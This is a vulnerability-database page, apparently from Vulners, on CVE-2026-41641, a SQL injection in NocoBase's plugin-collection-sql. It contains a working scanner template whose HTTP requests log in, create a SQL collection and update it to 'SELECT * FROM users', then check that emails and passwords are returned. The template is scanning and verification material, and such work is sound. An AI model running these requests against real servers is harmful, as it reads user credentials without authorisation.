| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2026-41641 | 7 May 202604:13 | – | attackerkb | |
| CVE-2026-41641 | 23 Apr 202609:48 | – | circl | |
| Nocobase SQL注入漏洞 | 7 May 202600:00 | – | cnnvd | |
| CVE-2026-41641 | 7 May 202604:13 | – | cve | |
| CVE-2026-41641 NocoBase Vulnerable to SQL Validation Bypass via `sqlCollection:update` Missing `checkSQL` Call | 7 May 202604:13 | – | cvelist | |
| EUVD-2026-28318 | 7 May 202604:13 | – | euvd | |
| @nocobase/plugin-collection-sql: SQL Validation Bypass Through Missing `checkSQL` Call | 22 Apr 202620:07 | – | github | |
| CVE-2026-41641 | 7 May 202606:16 | – | nvd | |
| GHSA-WRWH-C28M-9JJH @nocobase/plugin-collection-sql: SQL Validation Bypass Through Missing `checkSQL` Call | 22 Apr 202620:07 | – | osv | |
| PT-2026-34610 | 22 Apr 202600:00 | – | ptsecurity |
id: CVE-2026-41641
info:
name: NocoBase - SQL Injection
author: theamanrawat
severity: high
description: |
NocoBase @nocobase/plugin-collection-sql versions prior to 2.0.39 are vulnerable to SQL injection via the sqlCollection:update endpoint. The checkSQL() function, which blocks dangerous SQL keywords and ensures only SELECT statements are allowed, is not called during collection updates.
remediation:
Upgrade NocoBase to version 2.0.39 or later
reference:
- https://github.com/advisories/GHSA-wrwh-c28m-9jjh
- https://nvd.nist.gov/vuln/detail/CVE-2026-41641
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2026-41641
epss-score: 0.01833
epss-percentile: 0.76308
cwe-id: CWE-89
metadata:
max-request: 5
verified: true
vendor: nocobase
product: nocobase
tags: cve,cve2026,sqli,nocobase,sqli,authenticated
flow: http(1) && http(2) && http(3) || http(4)
variables:
name: "{{randstr}}"
http:
- raw:
- |
POST /api/auth:signIn HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"account":"{{username}}","password":"{{password}}"}
extractors:
- type: regex
name: token
part: body
internal: true
regex:
- '"token":"([^"]+)"'
group: 1
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
condition: and
internal: true
- raw:
- |
POST /api/collections:create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Authorization: Bearer {{token}}
{"name":"{{name}}","sql":"SELECT 1 as id","fields":[{"name":"id","type":"integer"}],"template":"sql"}
- |
POST /api/sqlCollection:update?filterByTk={{name}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Authorization: Bearer {{token}}
{"sql":"SELECT * FROM users","fields": [ {"name": "id", "type": "integer"}, {"name": "email", "type": "string"}, {"name": "password", "type": "string"}]}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
condition: and
internal: true
- raw:
- |
GET /api/{{name}}:list HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Authorization: Bearer {{token}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "email", "password")'
condition: and
- method: GET
path:
- "{{BaseURL}}/api/app:getInfo"
extractors:
- type: regex
name: version
part: body
regex:
- '"version":"(.*?)"'
group: 1
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "\"dialect\"", "\"version\"")'
- 'compare_versions(version, "<2.0.39")'
condition: and
# digest: 490a004630440220347545fadafccd5c25191083caf92c2bdbeef37beb38d75ed438be778fc9d8870220688263ee58ed8a2faeb6c6ae2ad3917d03fe8aaf9c040ac634233d5e1b0f2779:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation